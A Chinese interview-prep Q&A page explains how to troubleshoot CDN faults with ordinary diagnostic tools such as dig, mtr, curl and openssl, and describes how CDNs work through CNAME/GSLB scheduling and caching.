CDN 故障排查的流程是什么？有哪些常用工具？

直接回答CDN 故障排查的核心流程：确认范围 → 检查DNS → 检查网络连通性 → 检查缓存状态 → 检查源站 → 定位修复。第一步，确认故障范围。问三个问题：是全量用户还是部分地域？是持续报错还是间歇性？是从什么时候开始的？范围判断决定后续排查方向——全局故障看CDN节点和DNS，局部故障看网络链路和缓存。第二步，检查DNS解析。 CDN 依赖 DNS 将用户调度到最近的边缘节点，DNS 出问题一切白搭。用 dig 或 nslookup 确认域名是否正确解析到 CDN CNAME，检查不同地域 DNS 服务器的解析结果是否一致。常见坑：DNS 缓存未更新导致调度到已下线节点。第三步，检查网络连通性。 ping 看延迟，traceroute 或 mtr 看链路丢包，curl -v 看 HTTP 握手各阶段耗时。重点关注 SSL 握手时间——如果证书链不完整或配置错误，握手会失败或变慢。第四步，检查缓存状态。看响应头里的 X-Cache 字段，HIT 还是 MISS。缓存命中率骤降是最常见的性能劣化原因。排查缓存键配置是否合理、TTL 是否过长导致内容不更新、是否有绕过缓存的请求头。第五步，检查源站。绕过 CDN 直接访问源站，如果源站也慢，问题在源站不在CDN。看源站负载、响应时间、错误日志。核心工具速查| 场景 | 工具 | 用法 ||------|------|------|| DNS排查 | dig/nslookup | dig @8.8.8.8 example.com || 网络延迟 | ping/mtr | mtr -r -c 10 cdn.example.com || HTTP调试 | curl | curl -w "@format.txt" -o /dev/null -s URL || SSL检查 | openssl | openssl s_client -connect host:443 || 缓存分析 | 日志+响应头 | grep "X-Cache" access.log \| sort \| uniq -c || 日志分析 | ELK Stack | Kibana 看错误率趋势和地域分布 |# curl 计时模板 curl-format.txttime_namelookup: %{time_namelookup}time_connect: %{time_connect}time_starttransfer: %{time_starttransfer}time_total: %{time_total}追问：缓存刷新后用户仍看到旧内容怎么办？先确认刷新是否生效——用 curl -I 检查响应头的 X-Cache 和 Last-Modified。如果刷新成功但用户仍看到旧内容，三个可能：本地浏览器缓存、中间运营商缓存、多CDN节点同步延迟。对应措施：版本化URL（app.js?v=2）、缩短TTL、检查CDN供应商的刷新接口是否覆盖全部节点。追问：如何预防CDN故障？三件事：监控告警（节点可用性、缓存命中率、错误率）、健康检查（定时探测各节点）、容灾预案（多CDN切换、源站冗余、DNS快速切流量）。面试中能讲出"监控+容灾"两条线，基本过关。

计算机基础阅读 05月27日 21:46

什么是CDN？CDN的工作原理是什么？

CDN 是什么？CDN（Content Delivery Network，内容分发网络）是一组分布在不同地理位置的服务器集群，核心目标是将内容缓存到离用户最近的边缘节点，减少网络延迟，加速资源访问。CDN 的工作原理用户请求资源时，完整流程如下：DNS 解析：用户访问域名，本地 DNS 向权威 DNS 查询，发现该域名配置了 CNAME 记录，指向 CDN 服务商域名GSLB 调度：请求到达 CDN 的 GSLB（全局负载均衡），根据用户 IP、节点负载、网络状况等综合判定，返回最优边缘节点 IP边缘响应：用户向该边缘节点发起请求，节点检查缓存——命中则直接返回；未命中则回源获取，缓存后返回给用户关键在于 CNAME + GSLB 这套调度机制，它让用户无感知地被路由到最近节点。核心技术点缓存策略缓存键：由 URL、Query String、请求头等生成，决定哪些请求命中同一份缓存TTL：控制缓存过期时间，过期后需回源验证或重新获取缓存层级：边缘缓存 → 区域缓存 → 源站，逐级回源缓存预热：主动将内容推送到边缘节点，避免首次访问回源缓存刷新：源站更新后，主动清除 CDN 缓存，保证内容时效性负载均衡GSLB：全局调度，决定用户访问哪个节点健康检查：实时监控节点状态，自动剔除故障节点CDN 与反向代理的区别| | CDN | 反向代理 ||---|---|---|| 部署位置 | 多地分布式边缘节点 | 通常部署在源站前面 || 核心目的 | 就近加速、降低延迟 | 安全防护、请求转发 || 缓存范围 | 面向全球用户 | 面向单一入口 |常见面试追问CDN 缓存命中率低怎么办？检查缓存键设计是否合理、TTL 是否过短、是否有大量动态参数干扰缓存CDN 回源风暴怎么处理？设置回源限流、使用缓存预热、配置请求合并（同回源请求合并为一次）HTTPS 场景下 CDN 如何工作？ CDN 节点与用户之间 HTTPS 加密，CDN 与源站之间也可 HTTPS，支持证书部署在 CDN 侧动态内容能否用 CDN？可以，通过动态加速（DCDN）优化路由和传输协议，但不走缓存

1
2
3
4